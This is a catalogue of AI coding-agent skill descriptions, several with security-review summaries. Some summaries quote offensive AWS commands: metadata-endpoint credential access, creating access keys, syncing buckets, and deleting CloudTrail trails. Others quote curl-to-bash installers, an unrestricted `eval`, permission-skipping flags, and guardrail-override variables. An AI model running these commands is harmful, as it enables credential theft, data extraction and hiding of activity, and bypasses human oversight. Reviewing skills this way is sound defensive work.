Skills by sickn33

This skill provides Docker containerization guidance for Dockerfiles, Compose orchestration, image optimization, and security hardening. It includes explicit shell commands (e.g., `docker build --no-cache -t test-build .`) and secret-handling patterns (`/run/secrets/api_key`, `POSTGRES_PASSWORD_FILE`) enabling local command execution and use of credentials.

Applies principles from Robert C. Martin's 'Clean Code'. Use this skill when writing, reviewing, or refactoring code to ensure high quality, readability, and maintainability. Covers naming, functions, comments, error handling, and class design.

Next.js App Router principles. Server Components, data fetching, routing patterns.

Provides guidance for building secure APIs (authentication, authorization, input validation, rate limiting, testing). Examples reference secrets via `process.env.JWT_SECRET` and `process.env.JWT_REFRESH_SECRET`, show a Redis client using `process.env.REDIS_HOST`/`process.env.REDIS_PORT`, and include a shell example `node -e "console.log(require('crypto').randomBytes(64).toString('hex'))"`.

This skill provides TypeScript expertise, diagnostic guidance, and helper scripts for project analysis and migration. It includes explicit shell commands (e.g., `npx tsc --version`) and a diagnostic script that invokes `subprocess.run(cmd, shell=True)` to execute shell commands.

Prisma ORM expert for schema design, migrations, query optimization, relations modeling, and database operations. Use PROACTIVELY for Prisma schema issues, migration problems, query performance, relation design, or database connection issues.

This skill provides Playwright-based browser automation and runs user scripts via `run.js`. It executes shell commands (`execSync('npm install')` / `require(.temp-execution-*.js)`), reads env headers like `PW_HEADER_NAME`/`PW_EXTRA_HEADERS`, and issues HTTP requests (e.g., `await page.request.head(href)`).

This skill provides UI/UX design guidance and local tooling to generate design systems. It instructs running `python3 .claude/skills/ui-ux-pro-max/scripts/search.py` and other shell commands and references ` .env.local` and `NEXT_PUBLIC_API_URL`.

This skill is a mobile-first design and engineering doctrine for iOS/Android and includes an audit script `scripts/mobile_audit.py`. It contains explicit CLI/debug instructions like `Usage: python mobile_audit.py <directory>` and storage guidance (`❌ NEVER store tokens in: AsyncStorage`), with no evidence of secret exfiltration.

High-risk Bun development guide that instructs running remote installers like `curl -fsSL https://bun.sh/install | bash` and `powershell -c "irm bun.sh/install.ps1 | iex"`. It also demonstrates network calls to `https://registry.npmmirror.com` and direct environment access such as `Bun.env.API_KEY` and `process.env.DATABASE_URL`.

Comprehensive software architecture skill for designing scalable, maintainable systems using ReactJS, NextJS, NodeJS, Express, React Native, Swift, Kotlin, Flutter, Postgres, GraphQL, Go, Python. Includes architecture diagram generation, system design patterns, tech stack decision frameworks, and dependency analysis. Use when designing system architecture, making technical decisions, creating architecture diagrams, evaluating trade-offs, or defining integration patterns.

Guide for quality focused software architecture. This skill should be used when users want to write code, design architecture, analyze code, in any case that relates to software development.

Generates developer-friendly API documentation from a codebase, producing endpoint details, examples, OpenAPI specs, and Postman collections (examples reference `https://api.example.com`). No security-relevant behaviors detected.

Nest.js framework expert specializing in module architecture, dependency injection, middleware, guards, interceptors, testing with Jest/Supertest, TypeORM/Mongoose integration, and Passport.js authentication. Use PROACTIVELY for any Nest.js application issues including architecture decisions, testing strategies, performance optimization, or debugging complex dependency injection problems. If a specialized expert is a better fit, I will recommend switching and stop.

Optimize website and web application performance including loading speed, Core Web Vitals, bundle size, caching strategies, and runtime performance

Game development orchestrator. Routes to platform-specific skills based on project needs.

This skill is a Node.js best-practices guide covering framework selection, architecture, async patterns, testing, and security. It includes explicit directives to run Node commands such as `Run .ts files directly` and `node --test src/**/*.test.ts`, i.e., shell execution examples.

Browser automation powers web testing, scraping, and AI agent interactions. The difference between a flaky script and a reliable system comes down to understanding selectors, waiting strategies, and anti-detection patterns. This skill covers Playwright (recommended) and Puppeteer, with patterns for testing, scraping, and agentic browser control. Key insight: Playwright won the framework war. Unless you need Puppeteer's stealth ecosystem or are Chrome-only, Playwright is the better choice in 202

Product Manager Toolkit provides RICE prioritization, interview analysis, PRD templates, and go-to-market frameworks. It includes explicit commands like `python scripts/rice_prioritizer.py features.csv` and `python scripts/customer_interview_analyzer.py interview.txt` to run local scripts; no secret-access or remote endpoints are instructed.

Comprehensive fullstack development skill for building complete web applications with React, Next.js, Node.js, GraphQL, and PostgreSQL. Includes project scaffolding, code quality analysis, architecture patterns, and complete tech stack guidance. Use when building new projects, analyzing code quality, implementing design patterns, or setting up development workflows.

This skill provides guidance and helper scripts for building Shopify apps, extensions, themes, and GraphQL integrations. It reads environment variables and `.env` files (`SHOPIFY_API_KEY`, `SHOPIFY_API_SECRET`, `SHOPIFY_ACCESS_TOKEN`), instructs executing `npm install -g @shopify/cli` and `shopify` commands, and makes network calls to `https://${shop}/admin/api/2026-01/graphql.json` and `https://your-app.com/api/data`.

Database design principles and decision-making. Schema design, indexing strategy, ORM selection, serverless databases.

Firebase gives you a complete backend in minutes - auth, database, storage, functions, hosting. But the ease of setup hides real complexity. Security rules are your last line of defense, and they're often wrong. Firestore queries are limited, and you learn this after you've designed your data model. This skill covers Firebase Authentication, Firestore, Realtime Database, Cloud Functions, Cloud Storage, and Firebase Hosting. Key insight: Firebase is optimized for read-heavy, denormalized data. I

Expert knowledge for deploying to Vercel with Next.js Use when: vercel, deploy, deployment, hosting, production.

Internationalization and localization patterns. Detecting hardcoded strings, managing translations, locale files, RTL support.

Documentation templates and structure guidelines. README, API docs, code comments, and AI-friendly documentation.

Expert in building Telegram bots that solve real problems - from simple automation to complex AI-powered bots. Covers bot architecture, the Telegram Bot API, user experience, monetization strategies, and scaling bots to thousands of users. Use when: telegram bot, bot api, telegram automation, chat bot telegram, tg bot.

Provides opinionated Node.js/Express/TypeScript backend development guidelines. Contains code that reads `../../config.ini` and `../sentry.ini`, references secrets like `DB_PASSWORD` and `JWT_SECRET`, configures Sentry (`https://your-sentry-dsn`), and includes runnable commands such as `npm test -- --coverage`.

Create distinctive, production-grade frontend interfaces with intentional aesthetics, high craft, and non-generic visual identity. Use when building or styling web UIs, components, pages, dashboards, or frontend applications.

This skill converts rough user prompts into optimized, framework-based prompts for Claude/ChatGPT and similar models. Installation instructs running `git clone https://github.com/eric.andrade/cli-ai-skills.git`, `cp -r /path/to/cli-ai-skills/.github/skills/prompt-engineer ~/.copilot/global-skills/`, and editing `~/.copilot/config.json`, which performs network fetches and modifies agent configuration.

Expert in building 3D experiences for the web - Three.js, React Three Fiber, Spline, WebGL, and interactive 3D scenes. Covers product configurators, 3D portfolios, immersive websites, and bringing depth to web experiences. Use when: 3D website, three.js, WebGL, react three fiber, 3D experience.

This skill defines opinionated frontend development standards and example code for React + TypeScript projects. It includes explicit API call examples such as `apiClient.get('/users/${userId}')` and `apiClient.get('/blog/posts/123')`, which instruct network requests.

Python development principles and decision-making. Framework selection, async patterns, type hints, project structure. Teaches thinking, not copying.

This skill provides a complete App Store Optimization toolkit for researching keywords, optimizing metadata, A/B testing, localization, and review analysis. It includes local installation commands such as `cp -r app-store-optimization ~/.claude/skills/` and `ls ~/.claude/skills/app-store-optimization/`, which are fixed setup shell commands (low risk).

Provides Bash/Linux command patterns, examples, and a script template for macOS/Linux. Contains explicit shell execution examples (`#!/bin/bash`, `ls -la`, `kill -9 <PID>`), network requests (`curl -X GET https://api.example.com`), and env var usage (`export VAR="value").

High-risk skill for automating GitHub workflows, PR reviews, CI/CD, and Git operations. It executes shell/git commands (e.g., `git rebase`, `git cherry-pick`, `git push`), uses secrets like `ANTHROPIC_API_KEY` and `GITHUB_TOKEN`, and calls external AI services via the Anthropic SDK.

Test-Driven Development workflow principles. RED-GREEN-REFACTOR cycle.

This skill documents React UI patterns for loading states, error handling, empty states, and form submission. No security-relevant behaviors detected.

Dangerous skill contains an unrestricted `eval` call (`return str(eval(expression))`) that executes untrusted input while demonstrating `LangGraph` agent patterns. It also instructs use of external LLM services via `ChatOpenAI` (`llm = ChatOpenAI(model="gpt-4o")`).

Use this skill before any creative or constructive work (features, components, architecture, behavior changes, or functionality). This skill transforms vague ideas into validated designs through disciplined, incremental reasoning and collaboration.

Expert in building browser extensions that solve real problems - Chrome, Firefox, and cross-browser extensions. Covers extension architecture, manifest v3, content scripts, popup UIs, monetization strategies, and Chrome Web Store publishing. Use when: browser extension, chrome extension, firefox addon, extension, manifest v3.

Memory is the cornerstone of intelligent agents. Without it, every interaction starts from zero. This skill covers the architecture of agent memory: short-term (context window), long-term (vector s...

This skill documents GEO best practices and includes a CLI audit script for analyzing public web pages. The documentation and examples instruct running `python scripts/geo_checker.py <project_path>`, a fixed command (low-risk shell execution) to analyze files.

Core principles of SEO including E-E-A-T, Core Web Vitals, technical foundations, content quality, and how modern search engines evaluate pages. This skill explains *why* SEO works, not how to execute specific optimizations.

Expert in designing and building autonomous AI agents. Masters tool use, memory systems, planning strategies, and multi-agent orchestration. Use when: build agent, AI agent, autonomous agent, tool use, function calling.

This skill documents PowerShell patterns for Windows (operator syntax, null checks, error handling, file/JSON operations, and a script template) and references paths like `C:\Users\User\file.txt` and env var ` $env:USERPROFILE`. No security-relevant behaviors detected.

Expert guide on prompt engineering patterns, best practices, and optimization techniques. Use when user wants to improve prompts, learn prompting strategies, or debug agent behavior.

This skill provides AWS serverless patterns for Lambda, API Gateway, DynamoDB, and SQS/SNS. It references the `TABLE_NAME` environment variable and uses AWS client libraries that imply network calls to AWS endpoints such as `https://${HttpApi}.execute-api.${AWS::Region}.amazonaws.com/prod`.

Workflow automation is the infrastructure that makes AI agents reliable. Without durable execution, a network hiccup during a 10-step payment flow means lost money and angry customers. With it, workflows resume exactly where they left off. This skill covers the platforms (n8n, Temporal, Inngest) and patterns (sequential, parallel, orchestrator-worker) that turn brittle scripts into production-grade automation. Key insight: The platforms make different tradeoffs. n8n optimizes for accessibility

API design principles and decision-making. REST vs GraphQL vs tRPC selection, response formats, versioning, pagination.

Jest testing patterns, factory functions, mocking strategies, and TDD workflow. Use when writing unit tests, creating test factories, or following TDD red-green-refactor cycle.

This skill is a comprehensive code review checklist covering functionality, security, performance, and maintainability. It instructs reviewers to `Pull the branch and run it locally`/`Run the Code - Test it locally` and to use environment variables such as `API_KEY` for secrets.

Expert in building immersive scroll-driven experiences - parallax storytelling, scroll animations, interactive narratives, and cinematic web experiences. Like NY Times interactives, Apple product pages, and award-winning web experiences. Makes websites feel like experiences, not just pages. Use when: scroll animation, parallax, scroll storytelling, interactive story, cinematic website.

Architectural decision-making framework. Requirements analysis, trade-off evaluation, ADR documentation. Use when making architecture decisions or analyzing system design.

Tailwind CSS v4 principles. CSS-first configuration, container queries, modern patterns, design token architecture.

This skill defines a `research-engineer` persona that enforces scientific rigor, full compilable implementations, and formal verification practices for engineering tasks. No security-relevant behaviors detected.

BullMQ expert for Redis-backed job queues, background processing, and reliable async execution in Node.js/TypeScript applications. Use when: bullmq, bull queue, redis queue, background job, job queue.

Expert in building portfolios that actually land jobs and clients - not just showing work, but creating memorable experiences. Covers developer portfolios, designer portfolios, creative portfolios, and portfolios that convert visitors into opportunities. Use when: portfolio, personal website, showcase work, developer portfolio, designer portfolio.

Use when a user asks for a plan for a coding task, to generate a clear, actionable, and atomic checklist.

Expert patterns for Clerk auth implementation, middleware, organizations, webhooks, and user sync Use when: adding authentication, clerk auth, user authentication, sign in, sign up.

Persistent memory systems for LLM conversations including short-term, long-term, and entity-based memory Use when: conversation memory, remember, memory persistence, long-term memory, chat history.

Specialized skill for building production-ready Discord bots. Covers Discord.js (JavaScript) and Pycord (Python), gateway intents, slash commands, interactive components, rate limiting, and sharding.

Expert in building Telegram Mini Apps (TWA) - web apps that run inside Telegram with native-like experience. Covers the TON ecosystem, Telegram Web App API, payments, user authentication, and building viral mini apps that monetize. Use when: telegram mini app, TWA, telegram web app, TON app, mini app.

Use when encountering any bug, test failure, or unexpected behavior, before proposing fixes

Create SEO-optimized marketing content with consistent brand voice. Includes brand voice analyzer, SEO optimizer, content frameworks, and social media templates. Use when writing blog posts, creating social media content, analyzing brand voice, optimizing SEO, planning content calendars, or when user mentions content creation, brand voice, SEO optimization, social media marketing, or content strategy.

Expert in launching small, focused SaaS products fast - the indie hacker approach to building profitable software. Covers idea validation, MVP development, pricing, launch strategies, and growing to sustainable revenue. Ship in weeks, not months. Use when: micro saas, indie hacker, small saas, side project, saas mvp.

This skill autonomously scans and transforms an entire codebase to production-grade quality. It requests broad filesystem access (`Read all files`, `package.json`, `requirements.txt`), executes tests (`Run all tests to ensure nothing broke`), and handles secrets via `DB_PASSWORD` and `JWT_SECRET`.

This skill provides performance-profiling guidance and an included script to run Lighthouse audits. The script executes the `lighthouse` CLI via `subprocess.run` and runs audits against arbitrary URLs (e.g., `https://example.com`).

The skill scaffolds and orchestrates full-stack projects and templates (e.g., `nextjs-fullstack`, `python-fastapi`). It instructs running shell commands like `npm install` and `python -m venv` and to configure env vars such as `DATABASE_URL` and `STRIPE_SECRET_KEY`, which are purpose-aligned.

This skill is a comprehensive JavaScript reference covering fundamentals, async patterns, and modern ES features for teaching and debugging. It includes example network calls such as `fetch('/api/users')` and `fetch('/api/posts')` but contains no instructions to access secrets, run shell commands, or modify agent identity.

Use this skill when writing, rewriting, or improving marketing copy for any page (homepage, landing page, pricing, feature, product, or about page). This skill produces clear, compelling, and testable copy while enforcing alignment, honesty, and conversion best practices.

This skill provides GCP Cloud Run patterns, example `Dockerfile`s, `gcloud` deploy commands, and Cloud Functions snippets for building serverless apps. It includes executable commands like `gcloud run deploy` and pushes to `gcr.io`, and shows `--allow-unauthenticated`, which grants broad public access.

Every product will be AI-powered. The question is whether you'll build it right or ship a demo that falls apart in production. This skill covers LLM integration patterns, RAG architecture, prompt engineering that scales, AI UX that users trust, and cost optimization that doesn't bankrupt you. Use when: keywords, file_patterns, code_patterns.

Expert in building Retrieval-Augmented Generation systems. Masters embedding models, vector databases, chunking strategies, and retrieval optimization for LLM applications. Use when: building RAG, vector search, embeddings, semantic search, document retrieval.

Stage, commit, and push git changes with conventional commit messages. Use when user wants to commit and push changes, mentions pushing to remote, or asks to save and push their work. Also activates when user says "push changes", "commit and push", "push this", "push to github", or similar git workflow requests.

GraphQL gives clients exactly the data they need - no more, no less. One endpoint, typed schema, introspection. But the flexibility that makes it powerful also makes it dangerous. Without proper controls, clients can craft queries that bring down your server. This skill covers schema design, resolvers, DataLoader for N+1 prevention, federation for microservices, and client integration with Apollo/urql. Key insight: GraphQL is a contract. The schema is the API documentation. Design it carefully.

Strategies for managing LLM context windows including summarization, trimming, routing, and avoiding context rot Use when: context window, token limit, context management, context engineering, long context.

A hybrid memory system that provides persistent, searchable knowledge management for AI agents (Architecture, Patterns, Decisions).

Expert patterns for Shopify app development including Remix/React Router apps, embedded apps with App Bridge, webhook handling, GraphQL Admin API, Polaris components, billing, and app extensions. Use when: shopify app, shopify, embedded app, polaris, app bridge.

Autonomous agents are AI systems that can independently decompose goals, plan actions, execute tools, and self-correct without constant human guidance. The challenge isn't making them capable - it's making them reliable. Every extra decision multiplies failure probability. This skill covers agent loops (ReAct, Plan-Execute), goal decomposition, reflection patterns, and production reliability. Key insight: compounding error rates kill autonomous agents. A 95% success rate per step drops to 60% b

Inngest expert for serverless-first background jobs, event-driven workflows, and durable execution without managing queues or workers. Use when: inngest, serverless background job, event-driven workflow, step function, durable execution.

Expert in building voice AI applications - from real-time voice agents to voice-enabled apps. Covers OpenAI Realtime API, Vapi for voice agents, Deepgram for transcription, ElevenLabs for synthesis, LiveKit for real-time infrastructure, and WebRTC fundamentals. Knows how to build low-latency, production-ready voice experiences. Use when: voice ai, voice agent, speech to text, text to speech, realtime voice.

This skill provides vulnerability scanning guidance and includes an executable scanner `scripts/security_scan.py`. The scanner runs local commands like `npm audit` and reads project files to detect secrets matching patterns such as `AKIA...`, `AWS_`, and `AZURE_`.

This skill documents design patterns for building autonomous coding agents and tool integrations. The examples include executing shell commands (`subprocess.run`, `subprocess.getoutput`), making network calls (`requests.get`, `page.goto`, `llm.chat`), and passing `os.environ`/`HOME` into subprocess environments.

Expert patterns for Neon serverless Postgres, branching, connection pooling, and Prisma/Drizzle integration Use when: neon database, serverless postgres, database branching, neon postgres, postgres serverless.

Production-ready patterns for building LLM applications. Covers RAG pipelines, agent architectures, prompt IDEs, and LLMOps monitoring. Use when designing AI applications, implementing RAG, building agents, or setting up LLM observability.

Diagnose and audit SEO issues affecting crawlability, indexation, rankings, and organic performance. Use when the user asks for an SEO audit, technical SEO review, ranking diagnosis, on-page SEO review, meta tag audit, or SEO health check. This skill identifies issues and prioritizes actions but does not execute changes. For large-scale page creation, use programmatic-seo. For structured data, use schema-markup.

Modern React patterns and principles. Hooks, composition, performance, TypeScript best practices.

This skill documents Test-Driven Development (TDD) practices and testing anti-patterns for developers. It includes explicit test-run instructions such as `npm test path/to/test.test.ts`, which instruct executing shell test commands.

This skill implements Manus-style file-based planning and automates creation and updating of `task_plan.md`, `findings.md`, and `progress.md`. It executes shell hooks (e.g., `cat task_plan.md`, `${CLAUDE_PLUGIN_ROOT}/scripts/check-complete.sh`) and performs web queries via `WebSearch`/`WebFetch`.

This skill provides guidance for designing agent tools, covering JSON Schema, tool descriptions, validation, and error handling. No security-relevant behaviors detected.

Review UI code for Web Interface Guidelines compliance. Use when asked to "review my UI", "check accessibility", "audit design", "review UX", or "check my site against best practices".

Expert in building products that wrap AI APIs (OpenAI, Anthropic, etc.) into focused tools people will pay for. Not just 'ChatGPT but different' - products that solve specific problems with AI. Covers prompt engineering for products, cost management, rate limiting, and building defensible AI businesses. Use when: AI wrapper, GPT product, AI tool, wrap AI, AI SaaS.

Expert patterns for Azure Functions development including isolated worker model, Durable Functions orchestration, cold start optimization, and production patterns. Covers .NET, Python, and Node.js programming models. Use when: azure function, azure functions, durable functions, azure serverless, function app.

This skill provides Twilio integration patterns for SMS, voice (TwiML IVR), and Verify (2FA). It reads `TWILIO_ACCOUNT_SID`, `TWILIO_AUTH_TOKEN`, `TWILIO_PHONE_NUMBER`, `TWILIO_VERIFY_SID`, `SALES_PHONE`, and `SUPPORT_PHONE` from the environment and makes network requests via `twilio.rest.Client`.

This skill provides patterns and code for building vision-based desktop automation agents. It includes runtime shell execution (`subprocess.run(["scrot", "/tmp/screenshot.png"])`) and use of remote model clients (`self.client = Anthropic()`), and defines exposed ports (`- "5900:5900"`) and env vars like `DISPLAY=:99`.

This skill documents how to create and manage Claude Code skills, hooks, and the `.claude/skills/skill-rules.json` configuration. It includes explicit shell commands for testing (e.g., `npx tsx .claude/hooks/skill-verification-guard.ts`, `chmod +x .claude/hooks/*.sh`, `npm install`) and direct env var overrides such as `SKIP_SKILL_GUARDRAILS` and `SKIP_DB_VERIFICATION`.

Intelligently organizes files and folders by understanding context, finding duplicates, and suggesting better organizational structures. Use when user wants to clean up directories, organize downloads, remove duplicates, or restructure projects.

Testing and benchmarking LLM agents including behavioral testing, capability assessment, reliability metrics, and production monitoring—where even top agents achieve less than 50% on real-world benchmarks Use when: agent testing, agent evaluation, benchmark agents, agent reliability, test agent.

Dangerous skill: runs local scripts (`python scripts/run.py ...`) and installs software while performing browser automation that saves and injects session cookies (`state.json`, `~/.claude/skills/notebooklm/data/`) and contacts `https://notebooklm.google.com`. It includes anti-detection measures (`--disable-blink-features=AutomationControlled`, `StealthUtils`) to evade site detection.

Curated collection of high-quality prompts for various use cases. Includes role-based prompts, task-specific templates, and prompt refinement techniques. Use when user needs prompt templates, role-play prompts, or ready-to-use prompt examples for coding, writing, analysis, or creative tasks.

Production deployment principles and decision-making. Safe deployment workflows, rollback strategies, and verification. Teaches thinking, not scripts.

Manage multiple local CLI agents via tmux sessions (start/stop/monitor/assign) with cron-friendly scheduling.

Voice agents represent the frontier of AI interaction - humans speaking naturally with AI systems. The challenge isn't just speech recognition and synthesis, it's achieving natural conversation flow with sub-800ms latency while handling interruptions, background noise, and emotional nuance. This skill covers two architectures: speech-to-speech (OpenAI Realtime API, lowest latency, most natural) and pipeline (STT→LLM→TTS, more control, easier to debug). Key insight: latency is the constraint. Hu

Use when you need to address review or issue comments on an open GitHub Pull Request using the gh CLI.

Use this skill when a design or idea requires higher confidence, risk reduction, or formal review. This skill orchestrates a structured, sequential multi-agent design review where each agent has a strict, non-overlapping role. It prevents blind spots, false confidence, and premature convergence.

Build Slack apps using the Bolt framework across Python, JavaScript, and Java. Covers Block Kit for rich UIs, interactive components, slash commands, event handling, OAuth installation flows, and Workflow Builder integration. Focus on best practices for production-ready Slack apps. Use when: slack bot, slack app, bolt framework, block kit, slash command.

Expert in Langfuse - the open-source LLM observability platform. Covers tracing, prompt management, evaluation, datasets, and integration with LangChain, LlamaIndex, and OpenAI. Essential for debugging, monitoring, and improving LLM applications in production. Use when: langfuse, llm observability, llm tracing, prompt management, llm evaluation.

`last30days` researches a user topic across Reddit, X, and the web and produces reports and copy-paste prompts. It directs running `python3 ~/.claude/skills/last30days/scripts/last30days.py`, creating/reading `~/.config/last30days/.env` with `OPENAI_API_KEY`/`XAI_API_KEY`, and calling `https://api.openai.com/v1/responses` and `https://api.x.ai/v1/responses`.

The skill automates creating CLI skills—brainstorming, templating, validation, and installation for Copilot/Claude/Codex. It contains explicit shell commands (e.g., `sed ... > ".github/skills/$SKILL_NAME/SKILL.md"`, `ln -sf "$SKILLS_REPO/.github/skills/$SKILL_NAME" "$HOME/.copilot/skills/$SKILL_NAME"`) and network fetches like `git clone https://github.com/yourusername/cli-ai-skills.git`.

Implement Stripe payment processing for robust, PCI-compliant payment flows including checkout, subscriptions, and webhooks. Use when integrating Stripe payments, building subscription systems, or implementing secure checkout flows.

Caching strategies for LLM prompts including Anthropic prompt caching, response caching, and CAG (Cache Augmented Generation) Use when: prompt caching, cache prompt, response cache, cag, cache augmented.

This skill documents best practices, templates, and utilities for authoring agent skills. It includes executable scripts and explicit instructions to run shell commands and install packages (e.g., `render-graphs.js`, `python scripts/analyze_form.py`, `pip install pypdf`), enabling local command execution and network package installs.

Multi-agent orchestration patterns. Use when multiple independent tasks can run with different domain expertise or when comprehensive analysis requires multiple perspectives.

Guide for continuous improvement, error proofing, and standardization. Use this skill when the user wants to improve code quality, refactor, or discuss process improvements.

Run tests and systematically fix all failing tests using smart error grouping. Use when user asks to fix failing tests, mentions test failures, runs test suite and failures occur, or requests to make tests pass.

Expert in building and selling Notion templates as a business - not just making templates, but building a sustainable digital product business. Covers template design, pricing, marketplaces, marketing, and scaling to real revenue. Use when: notion template, sell templates, digital product, notion business, gumroad.

Use when you have a written implementation plan to execute in a separate session with review checkpoints

Server management principles and decision-making. Process management, monitoring strategy, and scaling decisions. Teaches thinking, not commands.

This skill provides a framework for breaking work into actionable tasks and saving plan files as `{task-slug}.md` in the PROJECT ROOT. It contains explicit shell commands used as verification steps, e.g. `npx create-next-app`, `npm run dev`, and `curl localhost:3000/api/users`.

Email has the highest ROI of any marketing channel. $36 for every $1 spent. Yet most startups treat it as an afterthought - bulk blasts, no personalization, landing in spam folders. This skill covers transactional email that works, marketing automation that converts, deliverability that reaches inboxes, and the infrastructure decisions that scale. Use when: keywords, file_patterns, code_patterns.

Trigger.dev expert for background jobs, AI workflows, and reliable async execution with excellent developer experience and TypeScript-first design. Use when: trigger.dev, trigger dev, background task, ai background job, long running task.

Apply behavioral science and mental models to marketing decisions, prioritized using a psychological leverage and feasibility scoring system.

Expert in CrewAI - the leading role-based multi-agent framework used by 60% of Fortune 500 companies. Covers agent design with roles and goals, task definition, crew orchestration, process types (sequential, hierarchical, parallel), memory systems, and flows for complex workflows. Essential for building collaborative AI agent teams. Use when: crewai, multi-agent team, agent roles, crew of agents, role-based agents.

Design, audit, and improve analytics tracking systems that produce reliable, decision-ready data. Use when the user wants to set up, fix, or evaluate analytics tracking (GA4, GTM, product analytics, events, conversions, UTMs). This skill focuses on measurement strategy, signal quality, and validation— not just firing events.

Expert in building custom tools that solve your own problems first. The best products often start as personal tools - scratch your own itch, build for yourself, then discover others have the same itch. Covers rapid prototyping, local-first apps, CLI tools, scripts that grow into products, and the art of dogfooding. Use when: build a tool, personal tool, scratch my itch, solve my problem, CLI tool.

Expert in building shareable generator tools that go viral - name generators, quiz makers, avatar creators, personality tests, and calculator tools. Covers the psychology of sharing, viral mechanics, and building tools people can't resist sharing with friends. Use when: generator tool, quiz maker, name generator, avatar creator, viral tool.

Provide proven marketing strategies and growth ideas for SaaS and software products, prioritized using a marketing feasibility scoring system.

Expert patterns for Salesforce platform development including Lightning Web Components (LWC), Apex triggers and classes, REST/Bulk APIs, Connected Apps, and Salesforce DX with scratch orgs and 2nd generation packages (2GP). Use when: salesforce, sfdc, apex, lwc, lightning web components.

Build Retrieval-Augmented Generation (RAG) systems for LLM applications with vector databases and semantic search. Use when implementing knowledge-grounded AI, building document Q&A systems, or integrating LLMs with external knowledge bases.

This skill creates isolated git worktrees and automates project setup and tests. It includes shell commands such as `git worktree add`, `npm install`, and test runners that will execute on the host and may perform network package installs.

Use when you have a spec or requirements for a multi-step task, before touching code

Loki Mode is an autonomous multi-agent system that runs a CLI runner and orchestrates subagents to build, test, and deploy products. The package asks to start `claude --dangerously-skip-permissions`, executes shell commands such as `claude --dangerously-skip-permissions` and `python3 -m http.server`, and fetches remote resources via `https://api.github.com` and `https://raw.githubusercontent.com`.

Core component library and design system patterns. Use when building UI, using design tokens, or working with the component library.

Expert at handling file uploads and cloud storage. Covers S3, Cloudflare R2, presigned URLs, multipart uploads, and image optimization. Knows how to handle large files without blocking. Use when: file upload, S3, R2, presigned URL, multipart.

Design pricing, packaging, and monetization strategies based on value, customer willingness to pay, and growth objectives.

This skill documents Remotion video-production best practices and provides many code examples for assets, compositions, and animations. Examples include outbound network requests such as `fetch(`https://api.example.com/video/${props.videoId}`)` and `fetch('https://assets4.lottiefiles.com/packages/lf20_zyquagfl.json')`.

Create beautiful visual art in .png and .pdf documents using design philosophy. You should use this skill when the user asks to create a poster, piece of art, design, or other static piece. Create original visual designs, never copying existing artists' work to avoid copyright violations.

Use when facing 2+ independent tasks that can be worked on without shared state or sequential dependencies

When the user wants help with paid advertising campaigns on Google Ads, Meta (Facebook/Instagram), LinkedIn, Twitter/X, or other ad platforms. Also use when the user mentions 'PPC,' 'paid media,' 'ad copy,' 'ad creative,' 'ROAS,' 'CPA,' 'ad campaign,' 'retargeting,' or 'audience targeting.' This skill covers campaign strategy, ad creation, audience targeting, and optimization.

Expert patterns for HubSpot CRM integration including OAuth authentication, CRM objects, associations, batch operations, webhooks, and custom objects. Covers Node.js and Python SDKs. Use when: hubspot, hubspot api, hubspot crm, hubspot integration, contacts api.

AI operational modes (brainstorm, implement, debug, review, teach, ship, orchestrate). Use to adapt behavior based on task type.

Expert patterns for Algolia search implementation, indexing strategies, React InstantSearch, and relevance tuning Use when: adding search to, algolia, instantsearch, search api, search functionality.

Use when executing implementation plans with independent tasks in the current session

When the user wants to create competitor comparison or alternative pages for SEO and sales enablement. Also use when the user mentions 'alternative page,' 'vs page,' 'competitor comparison,' 'comparison page,' '[Product] vs [Product],' '[Product] alternative,' or 'competitive landing pages.' Covers four formats: singular alternative, plural alternatives, you vs competitor, and competitor vs competitor. Emphasizes deep research, modular content architecture, and varied section types beyond feature tables.

Red team tactics principles based on MITRE ATT&CK. Attack phases, detection evasion, reporting.

Structured guide for setting up A/B tests with mandatory gates for hypothesis, metrics, and execution readiness.

Use when about to claim work is complete, fixed, or passing, before committing or creating PRs - requires running verification commands and confirming output before making any success claims; evidence before assertions always

This skill provides Playwright tooling to start local servers and run browser automation via `scripts/with_server.py` and example scripts. It executes arbitrary shell commands (`subprocess.Popen` with `shell=True`, `subprocess.run`) and connects to `http://localhost:5173`.

Design, validate, and optimize schema.org structured data for eligibility, correctness, and measurable SEO impact. Use when the user wants to add, fix, audit, or scale schema markup (JSON-LD) for rich results. This skill evaluates whether schema should be implemented, what types are valid, and how to deploy safely according to Google guidelines.

When the user wants help creating, scheduling, or optimizing social media content for LinkedIn, Twitter/X, Instagram, TikTok, Facebook, or other platforms. Also use when the user mentions 'LinkedIn post,' 'Twitter thread,' 'social media,' 'content calendar,' 'social scheduling,' 'engagement,' or 'viral content.' This skill covers content creation, repurposing, and platform-specific strategies.

This skill runs automated linting and type-coverage checks for Node.js and Python and exposes `scripts/lint_runner.py` and `scripts/type_coverage.py`. It executes shell commands such as `npm run lint`/`npx eslint` via `subprocess.run`, enabling external command execution.

When the user wants to edit, review, or improve existing marketing copy. Also use when the user mentions 'edit this copy,' 'review my copy,' 'copy feedback,' 'proofread,' 'polish this,' 'make this better,' or 'copy sweep.' This skill provides a systematic approach to editing marketing copy through multiple focused passes.

Use when starting any conversation - establishes how to find and use skills, requiring Skill tool invocation before ANY response including clarifying questions

Creating algorithmic art using p5.js with seeded randomness and interactive parameter exploration. Use this when users request creating art using code, generative art, algorithmic art, flow fields, or particle systems. Create original algorithmic art rather than copying existing artists' work to avoid copyright violations.

Master guide for using Claude Code effectively. Includes configuration templates, prompting strategies "Thinking" keywords, debugging techniques, and best practices for interacting with the agent.

When the user wants to optimize post-signup onboarding, user activation, first-run experience, or time-to-value. Also use when the user mentions "onboarding flow," "activation rate," "user activation," "first-run experience," "empty states," "onboarding checklist," "aha moment," or "new user experience." For signup/registration optimization, see signup-flow-cro. For ongoing email sequences, see email-sequence.

Dangerous skill: provides step-by-step offensive AWS operations including `curl http://169.254.169.254/latest/meta-data/`, `aws iam create-access-key`, `aws s3 sync s3://bucket-name ./local-folder`, and instructions to `aws cloudtrail delete-trail --name trail_name`. It presents itself as a pentesting guide but contains explicit credential access, secret extraction, shell execution, network exfiltration, and trace-obfuscation techniques.

No-code automation democratizes workflow building. Zapier and Make (formerly Integromat) let non-developers automate business processes without writing code. But no-code doesn't mean no-complexity - these platforms have their own patterns, pitfalls, and breaking points. This skill covers when to use which platform, how to build reliable automations, and when to graduate to code-based solutions. Key insight: Zapier optimizes for simplicity and integrations (7000+ apps), Make optimizes for power

